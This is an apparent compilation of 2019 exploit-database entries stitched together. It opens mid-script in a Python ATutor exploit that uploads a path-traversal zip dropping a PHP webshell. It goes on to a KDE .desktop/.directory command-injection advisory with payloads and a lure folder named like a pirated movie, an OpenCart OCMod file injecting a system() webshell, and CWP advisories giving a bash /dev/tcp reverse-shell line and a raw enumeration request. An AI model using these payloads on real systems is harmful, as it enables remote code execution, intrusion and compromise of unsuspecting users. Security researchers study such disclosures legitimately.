data += "\xa7\xfc\x64\x67\xa7\x9c\x48\xa3\x8c\x32\x4f\x0f\xa7\x8c\x64"
data += "\x63\x3f\x83\x44\x0f\x2f\x43\x6f\xe7\xa0\xb4\x20\x83\xb0\xd0"
data += "\xf0\xca\x94\xe2\xc8\x70\xd3\xbc\x94\x70\xb7\xbc\xa8\xe0\x94"
data += "\x14\xef\x90\xe2\xf4\x80\x2a\x13\x3f\xe7\x74\x5b\x5b\x25\x4d"
data += "\x4d\x6b\x05\x7b\x3b\x00\x50\x4b\x01\x02\x14\x03\x14\x00\x00"
data += "\x00\x08\x00\xa4\x00\xb8\x4e\xbb\xb9\x35\x2d\x6a\x00\x00\x00"
data += "\x6a\x00\x00\x00\x2c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
data += "\x00\x80\x01\x00\x00\x00\x00\x2e\x2e\x5c\x2e\x2e\x5c\x2e\x2e"
data += "\x5c\x2e\x2e\x5c\x2e\x2e\x5c\x2e\x2e\x2f\x78\x61\x6d\x70\x70"
data += "\x5c\x68\x74\x64\x6f\x63\x73\x5c\x6c\x69\x71\x75\x69\x64\x73"
data += "\x6b\x79\x2e\x70\x68\x70\x50\x4b\x01\x02\x14\x03\x14\x00\x00"
data += "\x00\x08\x00\xa4\x00\xb8\x4e\xbb\xb9\x35\x2d\x6a\x00\x00\x00"
data += "\x6a\x00\x00\x00\x2c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
data += "\x00\x80\x01\xb4\x00\x00\x00\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e"
data += "\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x76\x61\x72\x2f\x77"
data += "\x77\x77\x2f\x68\x74\x6d\x6c\x2f\x6c\x69\x71\x75\x69\x64\x73"
data += "\x6b\x79\x2e\x70\x68\x70\x50\x4b\x05\x06\x00\x00\x00\x00\x02"
data += "\x00\x02\x00\xb4\x00\x00\x00\x68\x01\x00\x00\x00\x00\x0d\x0a"
data += "\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d"
data += "\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x43"
data += "\x56\x45\x32\x30\x31\x39\x31\x32\x31\x36\x39\x0d\x0a\x43\x6f"
data += "\x6e\x74\x65\x6e\x74\x2d\x44\x69\x73\x70\x6f\x73\x69\x74\x69"
data += "\x6f\x6e\x3a\x20\x66\x6f\x72\x6d\x2d\x64\x61\x74\x61\x3b\x20"
data += "\x6e\x61\x6d\x65\x3d\x22\x73\x75\x62\x6d\x69\x74\x22\x0d\x0a"
data += "\x0d\x0a\x49\x6d\x70\x6f\x72\x74\x0d\x0a\x2d\x2d\x2d\x2d\x2d"
data += "\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d"
data += "\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x43\x56\x45\x32\x30\x31"
data += "\x39\x31\x32\x31\x36\x39\x2d\x2d\x0d\x0a"


#reverse shell url
shell = "http://" + target + "/liquidsky.php?language=" + commands

# Generate Hash
def gen_hash(passwd, token):
        m= hashlib.sha1()
        m.update(passwd + token)
        return m.hexdigest()

def we_can_get_jiggy_with_the_pass():

# Run pass through SHA1
     hash_object = hashlib.sha1(password)
     hex_dig = hash_object.hexdigest()
     print "[*] Got SHA1 for pass: " + (hex_dig)

     targeturl = "http://" + target + "/ATutor/login.php"
     token = "abc"
     hashed = gen_hash(hex_dig, token)
     d = {
"form_password_hidden" : hashed,
"form_login": "admin",
"submit": "Login",
"token" : token
     }
     s = requests.Session()

#Logging in
     r = s.post(targeturl, data=d)
     print "[+] Logging in to system as %s ..." % (username)
     res = r.text

# url settings, duh
     url = "http://" + target + "/ATutor/mods/_core/languages/language_import.php"

# A similar method works for the "patcher" function.
    # url = "http://" + target + "/ATutor/mods/_standard/patcher/index_admin.php"

# This is "the" request to send the zip     
     request = s.post(url, headers=headers, data=data, verify=False)
     print "[+] Sent the zip ......"
     time.sleep(1)

# Grab shell dude!
     print "[!] *** Remote Code Execution ***"
     request = s.post(shell, verify=False)
     print "[x] http://" + target + "/liquidsky.php?language=" + commands

# Note be sure to clean up: c:\xampp\htdocs\liquidsky.php and or /var/www/html/liquidsky.php

     if "Administration" in res:
         return True
     return False 

def main():
     if we_can_get_jiggy_with_the_pass():
         print ""
         print "[+] Success! we were able to login!"
         print ""
         print "  ^_~  got r00t?   - [liquidsky 2019]"
     else:         print "[-] failure!"

if __name__ == "__main__":
     main()

                         _       _ 
      _______ _ __ ___  | | ___ | |
     |_  / _ \ '__/ _ \ | |/ _ \| |
      / /  __/ | | (_) || | (_) | |
     /___\___|_|  \___(_)_|\___/|_|
            https://zero.lol
         zero days 4 days

Title: KDE 4/5 KDesktopFile Command Injection
Date: July 28th 2019
Author: Dominik Penner / zer0pwn
Vendor Homepage: https://kde.org/
Software Link: https://cgit.kde.org
Version: 5.60.0 and below

Description:
KDE 4/5 is vulnerable to a command injection vulnerability in the KDesktopFile class. When a .desktop or .directory file is instantiated, it unsafely evaluates environment variables and shell expansions using KConfigPrivate::expandString() via the KConfigGroup::readEntry() function. Using a specially crafted .desktop file a remote user could be compromised by simply downloading and viewing the file in their file manager, or by drag and dropping a link of it into their documents or desktop.

The main issue at hand is the fact that the KDE configuration specification is inconsistent with that of XDG (freedesktop). Despite this, KDE mixes its configuration syntax with that of XDG's, allowing for dynamic configuration entries (https://userbase.kde.org/KDE_System_Administration/Configuration_Files#Shell_Expansion).

When we combine this /feature/ with the way KDE handles .desktop and .directory files, we can force the file to evaluate some of the entries within the [Desktop Entry] tag. Some of the entries in this tag include "Icon", "Name", etc. The exploit is dependent on the entry that gets read by the KConfigGroup::readEntry() function. Generally whenever KDE needs to display these entries is when they'll get called. So for example, if we were to browse to the malicious file in our file manager (dolphin), the Icon entry would get called in order to display the icon. Since we know this, we can use a shell command in place of the Icon entry, which in turn will execute our command whenever the file is viewed.

Theoretically, if we can control config entries and trigger their reading, we can achieve command injection / RCE. I imagine there must be more ways to abuse this, however this is the most reliable way I've discovered so far.

Exploit/POCs:

1) payload.desktop

[Desktop Entry]
Icon[$e]=$(echo${IFS}0>~/Desktop/zero.lol&)

2) .directory

[Desktop Entry]
Type=Directory
Icon[$e]=$(echo${IFS}0>~/Desktop/zero.lol&)


Now whenever the files are viewed either in Dolphin, or on the Desktop (or while browsing an SMB share w/ smb4k) your commands will execute. The command processor doesn't seem to like spaces so just use $IFS and you'll be good. For the .desktop payload, it's as simple as having a remote user view the file on their local file system. The .directory payload has another part to it. .directory files are meant for setting configuration entries for the directory itself. Meaning we can set the Icon of the parent directory, and trigger it whenever someone views the folder. This requires nesting directories.

Example:

$ mkdir Hackers.1995.720p.BrRip.x264.YIFY
$ cd Hackers.1995.720p.BrRip.x264.YIFY
$ mkdir YIFY; cd YIFY
$ vi .directory
[Desktop Entry]
Type=Directory
Icon[$e]=$(echo${IFS}0>~/Desktop/zer0.lol&)

Now whenever someone opens the "Hackers.1995.720p.BrRip.x264.YIFY" directory, the YIFY directory will attempt to load the Icon from the .directory file, executing our command(s).

The code:

----------------kdesktopfile.cpp-----------------------------------------------------
  182 QString KDesktopFile::readIcon() const
  183 {
  184     Q_D(const KDesktopFile);
  185     return d->desktopGroup.readEntry("Icon", QString()); <---------------------
  186 }
-------------------------------------------------------------------------------------

-----------------kconfiggroup.cpp----------------------------------------------------
  679 QString KConfigGroup::readEntry(const char *key, const QString &aDefault) const
  680 {
  681     Q_ASSERT_X(isValid(), "KConfigGroup::readEntry", "accessing an invalid group");
  682 
  683     bool expand = false;
  684 
  685     // read value from the entry map
  686     QString aValue = config()->d_func()->lookupData(d->fullName(), key, KEntryMap::SearchLocalized,
  687                      &expand);
  688     if (aValue.isNull()) {
  689         aValue = aDefault;
  690     }
  691 
  692     if (expand) {
  693         return KConfigPrivate::expandString(aValue); <-------------------------
  694     }
  695 
  696     return aValue;
  697 }
-------------------------------------------------------------------------------------

-----------------kconfig.cpp---------------------------------------------------------
  178 QString KConfigPrivate::expandString(const QString &value)
  179 {
  180     QString aValue = value;
  181 
  182     // check for environment variables and make necessary translations
  183     int nDollarPos = aValue.indexOf(QLatin1Char('$'));
  184     while (nDollarPos != -1 && nDollarPos + 1 < aValue.length()) {
  185         // there is at least one $
  186         if (aValue[nDollarPos + 1] == QLatin1Char('(')) {
  187             int nEndPos = nDollarPos + 1;
  188             // the next character is not $
  189             while ((nEndPos <= aValue.length()) && (aValue[nEndPos] != QLatin1Char(')'))) {
  190                 nEndPos++;
  191             }
  192             nEndPos++;
  193             QString cmd = aValue.mid(nDollarPos + 2, nEndPos - nDollarPos - 3);
  194 
  195             QString result;
  196 
  197 // FIXME: wince does not have pipes
  198 #ifndef _WIN32_WCE
  199             FILE *fs = popen(QFile::encodeName(cmd).data(), "r"); <-----------
  200             if (fs) {
  201                 QTextStream ts(fs, QIODevice::ReadOnly);
  202                 result = ts.readAll().trimmed();
  203                 pclose(fs);
  204             }
  205 

<?xml version="1.0" encoding="utf-8"?>

<!-- Opencart <= 2.3.0.2 Insecure OCMod Generation Pre-Auth RCE         -->

<!-- Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>          -->

<!--    Disclaimer:                                                     -->

<!--    This or previous programs is for Educational                    -->
<!--    purpose ONLY. Do not use it without permission.                 -->
<!--    The usual disclaimer applies, especially the                    -->
<!--    fact that Todor Donev is not liable for any                     -->
<!--    damages caused by direct or indirect use of the                 -->
<!--    information or functionality provided by these                  -->
<!--    programs. The author or any Internet provider                   -->
<!--    bears NO responsibility for content or misuse                   -->
<!--    of these programs or any derivatives thereof.                   -->
<!--    By using these programs you accept the fact                     -->
<!--    that any damage (dataloss, system crash,                        -->
<!--    system compromise, etc.) caused by the use                      -->
<!--    of these programs is not Todor Donev's                          -->
<!--    responsibility.                                                 -->

<!--    Use them at your own risk!                                      -->

<!--    NOTES: This file must be - oc2302_preauth_rce.ocmod.xml         -->

<modification>
<name><![CDATA[Opencart <= 2.3.0.2 Insecure OCMod Generation Pre-Auth RCE]]></name>
<code><![CDATA[Opencart <= 2.3.0.2 Insecure OCMod Generation Pre-Auth RCE]]></code>
<version>1.0</version>
<author>Todor Donev</author>
<link>mailto:todor.donev@gmail.com</link>

<file path="catalog/controller/common/header.php">
<operation>
<search><![CDATA[// For page specific css]]></search>
<add position="before"><![CDATA[    if(isset($this->request->get['cmd'])){
      echo "<pre>";
      $cmd = ($this->request->get['cmd']);
      system($cmd);
      echo "</pre>";
    }]]></add>
</operation>
</file>
</modification>    

# Exploit Title: CWP (CentOS Control Web Panel) 0.9.8.836 - Remote Command Execution
# Date: 6 July 2019
# Exploit Author: Pongtorn Angsuchotmetee, Nissana Sirijirakal, Narin Boonwasanarak
# Vendor Homepage: https://control-webpanel.com/
# Version: 0.9.8.836
# Tested on: CentOS 7.6.1810 (Core)
# CVE : CVE-2019-13386

+++++++++++++++++++++++++++++++++
#  Description:
+++++++++++++++++++++++++++++++++

From the application interface, it does not allow user to run OS commands directly. If user want to run OS commands, they need to do it through crontab function. The vulnerability allows users to executed OS commands directly through web browser.

+++++++++++++++++++++++++++++++++
#  Steps to Reproduce
+++++++++++++++++++++++++++++++++

1. Login into the CentOS Web Panel using user credential
2. Go to file manager
3. add "?action=9" on url , bash terminal will show
   Example: https://[target.com]:2083/cwp_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx/username/fileManager2.php?action=9
4. Users can run OS commands through web browser
5. Create reverse shell through OS commands 
      - reverse shell payload "bash -i >& /dev/tcp/[local IP Address]/[port] 0>&1"

+++++++++++++++++++++++++++++++++
# POC
+++++++++++++++++++++++++++++++++

https://github.com/i3umi3iei3ii/CentOS-Control-Web-Panel-CVE/blob/master/CVE-2019-13386.md

+++++++++++++++++++++++++++++++++
# Timeline
+++++++++++++++++++++++++++++++++
2019-07-05: Discovered the bug
2019-07-05: Reported to vendor
2019-07-05: Vender accepted the vulnerability
2019-07-11: The vulnerability has been fixed
2019-07-23: Published

+++++++++++++++++++++++++++++++++
# Discovered by
+++++++++++++++++++++++++++++++++
Pongtorn Angsuchotmetee
Nissana Sirijirakal
Narin Boonwasanarak

# Exploit Title: CWP (CentOS Control Web Panel) User Enumeration
# Date: 23 July 2019
# Exploit Author: Pongtorn Angsuchotmetee, Nissana Sirijirakal, Narin Boonwasanarak
# Vendor Homepage: https://control-webpanel.com/
# Version: 0.9.8.836 to 0.9.8.840
# Tested on: CentOS 7.6.1810 (Core)
# CVE : CVE-2019-13385

+++++++++++++++++++++++++++++++++
#  Description:
+++++++++++++++++++++++++++++++++

An attacker who gains access as a low privilege user can check active users on the system by checking log file.
The access log is stored at /tmp directory with encoded content in base64 format.

+++++++++++++++++++++++++++++++++
#  Steps to Reproduce
+++++++++++++++++++++++++++++++++

1. Login as a low privilege user
2. Browse to https://[target.com]:2083/cwp_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx/username/fileManager2.php?frame=3&fm_current_dir=/tmp/// 
3. login log is login.log file in base64 format

Request: 

GET /cwp_70b80498fb4cb150/user1/fileManager2.php?frame=3&fm_current_dir=/tmp/// HTTP/1.1
Host: 192.168.40.129:2083
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: https://192.168.40.129:2083/cwp_70b80498fb4cb150/user1/fileManager2.php?frame=2
Accept-Encoding: gzip, deflate
Accept-Language: en,th-TH;q=0.9,th;q=0.8

+++++++++++++++++++++++++++++++++
# PoC
+++++++++++++++++++++++++++++++++

https://github.com/i3umi3iei3ii/CentOS-Control-Web-Panel-CVE/blob/master/CVE-2019-13385.md

+++++++++++++++++++++++++++++++++
#  Timeline
+++++++++++++++++++++++++++++++++
2019-07-03: Discovered the bug
2019-07-03: Reported to vendor
2019-07-04: Vender accepted the vulnerability
2019-07-11: The vulnerability has been fixed
2019-07-23: Published


+++++++++++++++++++++++++++++++++
# Discovered by
+++++++++++++++++++++++++++++++++
Pongtorn Angsuchotmetee
Nissana Sirijirakal
Narin Boonwasanarak